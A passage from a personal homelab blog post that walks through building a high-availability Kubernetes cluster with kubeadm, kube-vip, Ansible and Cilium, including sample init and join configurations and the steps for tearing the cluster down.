<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">install kubernetes tools</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.apt</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">kubelet</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">kubeadm</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">kubectl</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">install_recommends</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>In addition to installing the tools, they should also be pinned to their
respective versions, as updating the Kubernetes tools cannot be done during a
random system package update:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pin kubelet version</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dpkg_selections</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kubelet</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">selection</span>: <span style="color:#ae81ff">hold</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pin kubeadm version</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dpkg_selections</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kubeadm</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">selection</span>: <span style="color:#ae81ff">hold</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pin kubectl version</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dpkg_selections</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kubectl</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">selection</span>: <span style="color:#ae81ff">hold</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">autostart kubelet</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubelet</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.systemd_service</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kubelet</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span></code></pre></div><p>At the end, I&rsquo;m also making sure that the kubelet is auto-started.</p>
<h2 id="setting-up-kube-vip-as-a-load-balancer-for-the-control-plane">Setting up kube-vip as a load balancer for the control plane</h2>
<p>If you want a HA control plane with Kubernetes, you need a load balancer to
balance the Kubernetes API endpoint to the three control plane instances.</p>
<p>Luckily, you don&rsquo;t need to migrate your Homelab into a cloud to make this work.
Through some helpful comments on the Fediverse, I was pointed towards the
<a href="https://kube-vip.io/">kube-vip</a> app. It provides a virtual IP for the control
plane, notably the Kubernetes API server. In my setup, I ran it as a static
pod, as I liked the idea of tying it to the kubelet, instead of running it
standalone.</p>
<p>To do so, I put the following static pod config file into <code>/etc/kubernetes/manifests/kube-vip.yaml</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Pod</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">creationTimestamp</span>: <span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-vip</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">kube-system</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">manager</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vip_arp</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bgp_enable</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;false&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">port</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;6443&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vip_cidr</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;32&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cp_enable</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">svc_enable</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;false&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cp_namespace</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">kube-system</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vip_ddns</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;false&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vip_leaderelection</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vip_leasename</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">plndr-cp-lock</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vip_leaseduration</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;5&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vip_renewdeadline</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;3&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vip_retryperiod</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;1&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">address</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">10.12.0.100</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">prometheus_server</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: :<span style="color:#ae81ff">2112</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">ghcr.io/kube-vip/kube-vip:v0.6.2</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">imagePullPolicy</span>: <span style="color:#ae81ff">Always</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-vip</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>: {}
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">capabilities</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">add</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">NET_ADMIN</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">NET_RAW</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/etc/kubernetes/admin.conf</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kubeconfig</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">hostAliases</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">hostnames</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">ip</span>: <span style="color:#ae81ff">127.0.0.1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">hostNetwork</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">hostPath</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/kubernetes/admin.conf</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kubeconfig</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">status</span>: {}
</span></span></code></pre></div><p>Most of these options should be relatively clear. More information can be found
in the <a href="https://kube-vip.io/docs/installation/flags/">docs</a>.
Important to note are the
<code>vip_arp</code> and <code>bgp_enable</code> options. These configure how the address is made
known. Because I&rsquo;m definitely not a networking wizard, I went with the simpler
ARP based approach.</p>
<p>Also worth noting is that I disabled the <code>svc_enable</code> option, which can be
switched on to allow kube-vip to act as a <code>LoadBalancer</code> for Kubernetes services
of that type. To reduce initial complexity, I will be working with ClusterIP and
NodePort services for now and look at LoadBalancer type services later again,
including things like MetalLB.</p>
<p>The final and most important config is <code>address</code>. It determines which virtual IP
address kube-vip will advertise. In my case, I also added a DNS name for that IP
into my authoritative DNS server for easier access.</p>
<p>Kube-vip should be a static pod, so it can
run (more or less) outside Kubernetes. In my setup, this is necessary because
I will point <code>kubeadm</code> towards the virtual IP during the setup of the actual
cluster, so kube-vip needs to work before the cluster is actually up and
running.</p>
<h1 id="initializing-the-cluster">Initializing the cluster</h1>
<p>All preparations finally complete, it&rsquo;s time to get ourselves a Kubernetes
cluster. As I&rsquo;ve noted above, I&rsquo;m using vanilla k8s with <strong>kubeadm</strong>. There
are two ways to initialize the cluster and add additional nodes. First,
using the command line. Second, using a kubeadm init config file.
I will be going with the config file approach, to be able to put the
initialization under version control.</p>
<p>Generally speaking, command line flags and config files cannot be mixed at
the moment.</p>
<p>The documentation for the init config file can be found <a href="https://kubernetes.io/docs/reference/config-api/kubeadm-config.v1beta4/#kubeadm-k8s-io-v1beta4-InitConfiguration">here</a>.</p>
<p>There is no default location for the config file, so I just put them alongside
all of the other Kubernetes configs under <code>/etc/kubernetes</code>.</p>
<p>And here is my init config:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">kubeadm.k8s.io/v1beta3</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">InitConfiguration</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">skipPhases</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#e6db74">&#34;addon/kube-proxy&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">nodeRegistration</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">kubeletExtraArgs</span>:
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% if &#39;kube_ceph&#39; in group_names %}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">node-labels</span>: <span style="color:#e6db74">&#34;homelab.role=ceph&#34;</span>
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% elif &#39;kube_controllers&#39; in group_names %}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">node-labels</span>: <span style="color:#e6db74">&#34;homelab.role=controller&#34;</span>
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% elif &#39;kube_workers&#39; in group_names %}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">node-labels</span>: <span style="color:#e6db74">&#34;homelab.role=worker&#34;</span>
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% endif %}</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">kubeadm.k8s.io/v1beta3</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ClusterConfiguration</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">networking</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">podSubnet</span>: <span style="color:#e6db74">&#34;10.20.0.0/16&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceSubnet</span>: <span style="color:#e6db74">&#34;10.21.0.0/16&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">controlPlaneEndpoint</span>: <span style="color:#e6db74">&#34;api.k8s.example.com:6443&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiServer</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">timeoutForControlPlane</span>: <span style="color:#ae81ff">4m0s</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">extraArgs</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">authorization-mode</span>: <span style="color:#e6db74">&#34;Node,RBAC&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">controllerManager</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">extraArgs</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">allocate-node-cidrs</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">clusterName</span>: <span style="color:#e6db74">&#34;exp-cluster&#34;</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">kubelet.config.k8s.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">KubeletConfiguration</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">cgroupDriver</span>: <span style="color:#e6db74">&#34;systemd&#34;</span>
</span></span></code></pre></div><p>First, you can see the defaults used without any flags or config files by running
the <code>kubeadm config print init-defaults</code>.</p>
<p>I&rsquo;m actually not diverging very much from the defaults here. As you can see with
the <code>if</code>s in the <code>kubeletExtraArgs</code>, I&rsquo;m using Ansible&rsquo;s templating engine here
to assign roles to nodes in Kubernetes node labels.
Furthermore, I&rsquo;m also disabling the <code>kube-proxy</code> initialization phase. This is
due to the fact that I will be using Cilium as my Container Networking plugin,
and it can provide the proxy functionality, mostly concerned with Kubernetes
service handling, already. So I don&rsquo;t want kubeadm to install <code>kube-proxy</code> on
the nodes.</p>
<p>For the cluster itself, I&rsquo;m also setting the service and pod CIDRs.</p>
<p><strong>Important note:</strong> I&rsquo;m using example values here, not my actual configs. If
you see any weird inconsistencies between IP addresses or DNS names, please yell
at me on <a href="https://social.mei-home.net/@mmeier">Mastodon</a>. &#x1f609;</p>
<p>The <code>allocate-node-cidrs</code> option for the controllerManager is recommended by
Cilium.</p>
<p>Last but not least, the Kubernetes docs recommend to set the cgroupDriver
explicitly, which I do in the <code>KubeletConfiguration</code>.</p>
<p>After this file has been defined, we can run the command to init the cluster on
the first control plane node:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>kubeadm init --upload-certs --config /etc/kubernetes/kube-init-config.yaml
</span></span></code></pre></div><p>Noteworthy here is the <code>--upload-certs</code> flag. Without it, the initial certs
generated for the cluster will not be stored inside the cluster. As a consequence,
they won&rsquo;t be usable for subsequent additions of more control plane nodes and
would require the execution of another command to generate a new set and upload
those to be able to add additional control plane nodes. By default, those certs
only have a TTL of 24 hours. So if you plan to add more control planes past
that point, you can skip that flag for now.</p>
<p>After this first node has been initialized, the next step is to copy the admin
cert to your workstation for use with <code>kubectl</code>. You can find it under
<code>/etc/kubernetes/admin.conf</code>.
To use this file, copy it to <code>~/.kube/config</code>.
And now you should be able to run your first command against your newly inaugurated
Kubernetes cluster, e.g. <code>kubectl get all -n kube-system</code>.</p>
<p><strong>Security note:</strong> This file contains the private key which gives you full
access to the new Kubernetes cluster. Secure it appropriately. I will probably
do another post once I&rsquo;ve figured out what to do with it.</p>
<p>You will see a number of pods, mostly the Kubernetes control plane elements,
namely <code>etcd</code>, <code>kube-apiserver</code>, <code>kube-controller-manager</code> and <code>kube-scheduler</code>.
In addition, there should be a <code>kube-vip</code> instance. If the <code>kubectl get</code> command
fails, first check whether <code>kube-vip</code> starts up correctly.
The kubectl config file we copied from the initial cluster node to the
workstation contains the address entered under the <code>controlPlaneEndpoint</code> in
the kubeadm init config above. In my setup, that&rsquo;s a DNS entry which points to
the virtual IP managed by kube-vip.</p>
<p>You will also see that the <code>coredns</code> pods are currently still in <code>PENDING</code> state.
That&rsquo;s because CoreDNS, the default Kubernetes internal DNS server, only starts
up when a Container Networking Interface plugin has been installed. In our case
that&rsquo;s Cilium.</p>
<h2 id="installing-cilium">Installing Cilium</h2>
<p>As I&rsquo;ve <a href="#preparing-the-machines">detailed the necessary preparations above</a>, the only thing left to
install Cilium is to run the install command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>cilium install --set ipam.mode<span style="color:#f92672">=</span>cluster-pool --set ipam.operator.clusterPoolIPv4PodCIDRList<span style="color:#f92672">=</span>10.20.0.0/16 --set kubeProxyReplacement<span style="color:#f92672">=</span>true --version 1.14.1 --set encryption.enabled<span style="color:#f92672">=</span>true --set encryption.type<span style="color:#f92672">=</span>wireguard
</span></span></code></pre></div><p>This command should be run on your workstation. Cilium will automatically
use the kubectl config file in <code>~/.kube/config</code> to contact the cluster and
install itself.</p>
<p>The <code>clusterPoolIPv4PodCIDRList</code> is important here. Because while we already set
the Pod address CIDR in the kubeadm init config file above, Cilium does not seem
to have access to that and instead uses its internal default.
In addition, I&rsquo;m telling Cilium here that it should act as a replacement for
<code>kube-proxy</code>. Finally, I&rsquo;m enabling pod-to-pod encryption with WireGuard. This
way, I don&rsquo;t have to care about encrypting traffic between pods myself, e.g.
by configuring all my services to use TLS.</p>
<p>If the install command fails and the Cilium pods do not come up, check to make
sure that the preconditions I noted above are all fulfilled.
You should now see a single <code>cilium-operator</code> and a <code>cilium</code> pod in Running
state when you execute <code>kubectl get pods -n kube-system</code>. Furthermore, the
CoreDNS pod should now also be in the Running state.</p>
<p>You can check whether everything went alright by executing <code>cilium status</code> on
your workstation.</p>
<h1 id="joining-remaining-nodes-to-the-cluster">Joining remaining nodes to the cluster</h1>
<p>For joining additional nodes, I went with a similar approach as for the cluster
init, using a <a href="https://kubernetes.io/docs/reference/config-api/kubeadm-config.v1beta3/#kubeadm-k8s-io-v1beta3-JoinConfiguration">join configuration file</a>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">kubeadm.k8s.io/v1beta3</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">JoinConfiguration</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">nodeRegistration</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">kubeletExtraArgs</span>:
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% if &#39;kube_ceph&#39; in group_names %}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">node-labels</span>: <span style="color:#e6db74">&#34;homelab.role=ceph&#34;</span>
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% elif &#39;kube_controllers&#39; in group_names %}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">node-labels</span>: <span style="color:#e6db74">&#34;homelab.role=controller&#34;</span>
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% elif &#39;kube_workers&#39; in group_names %}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">node-labels</span>: <span style="color:#e6db74">&#34;homelab.role=worker&#34;</span>
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% endif %}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">discovery</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">bootstrapToken</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">token</span>: <span style="color:#ae81ff">Token here</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">apiServerEndpoint</span>: <span style="color:#ae81ff">api.k8s.example.com:6443</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">caCertHashes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#34;Cert Hash here&#34;</span>
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% if &#39;kube_controllers&#39; in group_names %}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">controlPlane</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">certificateKey</span>: <span style="color:#e6db74">&#34;Cert key here&#34;</span>
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% endif %}</span>
</span></span></code></pre></div><p>This file is a bit more unwieldy than the init config, because it also needs
to contain some secrets. This wouldn&rsquo;t be a problem if those secrets were
permanent, I could just store them in Vault. But they are pretty short lived,
so storing them and templating them into the file during Ansible deployments
doesn&rsquo;t really work. So I just input them into the file without committing the
result to git.</p>
<p>When you run the <code>kubeadm init</code> command, the output will look something like
this, provided you supply the <code>--upload-certs</code> flag:</p>
<pre tabindex="0"><code>You can now join any number of control-plane node by running the following command on each as a root:
    kubeadm join 192.168.0.200:6443 --token 9vr73a.a8uxyaju799qwdjv --discovery-token-ca-cert-hash sha256:7c2e69131a36ae2a042a339b33381c6d0d43887e2de83720eff5359e26aec866 --control-plane --certificate-key f8902e114ef118304e561c3ecd4d0b543adc226b7a07f675f56564185ffe0c07
</code></pre><p>The important part you don&rsquo;t get without the <code>--upload-certs</code> flag is the
<code>--certificate-key</code>. This is required for new control plane nodes.
The values in this message fit into the <code>JoinConfiguration</code> as follows:</p>
<ul>
<li><strong>discovery.bootstrapToken.token:</strong> <code>--token</code> value</li>
<li><strong>discovery.bootstrapToken.caCertHashes:</strong> <code>--discovery-token-ca-cert-hash</code> value</li>
<li><strong>controlPlane:</strong> <code>--certificate-key</code> value</li>
</ul>
<p>A fully rendered version of the <code>JoinConfiguration</code> file above would look like
this, using the values from the <code>kubeadm init</code> example output:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">kubeadm.k8s.io/v1beta3</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">JoinConfiguration</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">nodeRegistration</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">kubeletExtraArgs</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">node-labels</span>: <span style="color:#e6db74">&#34;homelab.role=controller&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">discovery</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">bootstrapToken</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">token</span>: <span style="color:#e6db74">&#34;9vr73a.a8uxyaju799qwdjv&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">apiServerEndpoint</span>: <span style="color:#ae81ff">192.168.0.200</span>:<span style="color:#ae81ff">6443</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">caCertHashes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#34;sha256:7c2e69131a36ae2a042a339b33381c6d0d43887e2de83720eff5359e26aec866&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">controlPlane</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">certificateKey</span>: <span style="color:#e6db74">&#34;f8902e114ef118304e561c3ecd4d0b543adc226b7a07f675f56564185ffe0c07&#34;</span>
</span></span></code></pre></div><p>If some time has passed since running the <code>kubeadm init</code> command, the bootstrap
token and cert will have expired. You can recreate them by running the following
command on a control plane node which has already been initialized:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>kubeadm init phase upload-certs --upload-certs
</span></span></code></pre></div><p>The output created will be similar to this:</p>
<pre tabindex="0"><code>[upload-certs] Storing the certificates in Secret &#34;kubeadm-certs&#34; in the &#34;kube-system&#34; Namespace
[upload-certs] Using certificate key:
supersecretcertkey
</code></pre><p>The last line is the new value for <code>certificateKey</code>. The next step is generating
a fresh bootstrap token, as that is invalidated after 24 hours:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>kubeadm token create --certificate-key supersecretcertkey --print-join-command
</span></span></code></pre></div><p>This will create a fresh join command you can use to join additional control
nodes to the cluster or enter into your <code>JoinConfiguration</code> file.</p>
<p>Finally, additional worker nodes can be joined in a similar manner. Simply remove
the following lines from the <code>JoinConfiguration</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">controlPlane</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">certificateKey</span>: <span style="color:#e6db74">&#34;Cert key here&#34;</span>
</span></span></code></pre></div><h1 id="deleting-a-cluster">Deleting a cluster</h1>
<p>As I had to kill the cluster multiple times but did not want to completely
reinstall the nodes every time, I also researched how to remove a cluster.
The steps are as follows:</p>
<ul>
<li>First remove the CNI plugin, with <code>cilium uninstall</code> in my case</li>
<li>Starting with the worker nodes, execute the following commands on each node:
<ol>
<li><code>kubeadm reset</code></li>
<li><code>rm -fr /etc/cni</code></li>
<li>Reboot the machine (this is for undoing the networking changes of the CNI plugin)</li>
</ol>
</li>
</ul>
<p>It is important to note the order here, always start with the worker nodes before
removing the control plane nodes.</p>
<h1 id="final-thoughts">Final thoughts</h1>
<p>First of all: Yay, Kubernetes Cluster! &#x1f973;</p>
<p>This was a pretty vexing process. The research phase, before I set up a cluster
for the first time, was considerably longer than for my current Nomad/Consul/Vault
cluster. And I feel that that&rsquo;s mostly due to the differences in the documentation.
HashiCorp&rsquo;s docs, especially their tutorials, for all three tools, are top notch.</p>
<p>Sure, if you follow the instructions in the docs for Kubernetes and Cilium, you
will relatively reliably end up with a working cluster. But it just feels like
there are a lot more moving parts. And some decisions you need to make up front,
like choosing a CNI plugin and a container engine.</p>
<p>Don&rsquo;t misunderstand me,
having that choice is great. As I mentioned above, I&rsquo;m a fan of apps that don&rsquo;t
